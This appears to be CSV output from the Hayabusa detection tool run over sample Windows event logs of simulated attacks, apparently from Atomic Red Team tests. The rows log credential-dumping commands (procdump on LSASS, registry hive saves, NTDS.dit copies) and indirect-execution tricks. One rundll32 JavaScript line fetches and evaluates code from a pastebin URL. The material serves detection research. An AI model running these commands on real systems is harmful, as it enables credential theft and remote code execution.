2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe  -a -c  :  Path: C:\Windows\System32\pcalua.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe  -a Java  :  Path: C:\Windows\System32\pcalua.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe  -a C:\Windows\system32\javacpl.cpl  :  Path: C:\Windows\System32\pcalua.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe  :  Path: C:\Windows\System32\forfiles.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe""  :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles  /p c:\windows\system32 /m notepad.exe /c  c:\folder\normal.dll:evil.exe  :  Path: C:\Windows\System32\forfiles.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user  :  Path: C:\Windows\System32\whoami.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\sam sam  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\system system  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\security security  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe  create shadow /for=C:  :  Path: C:\Windows\System32\vssadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm  :  Path: C:\Windows\hh.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);}  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe""   :  Path: C:\Users\IEUser\Downloads\UACBypass.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders  :  Command: ""C:\Windows \System32\winSAT.exe"" formal  :  Path: C:\Windows \System32\winSAT.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
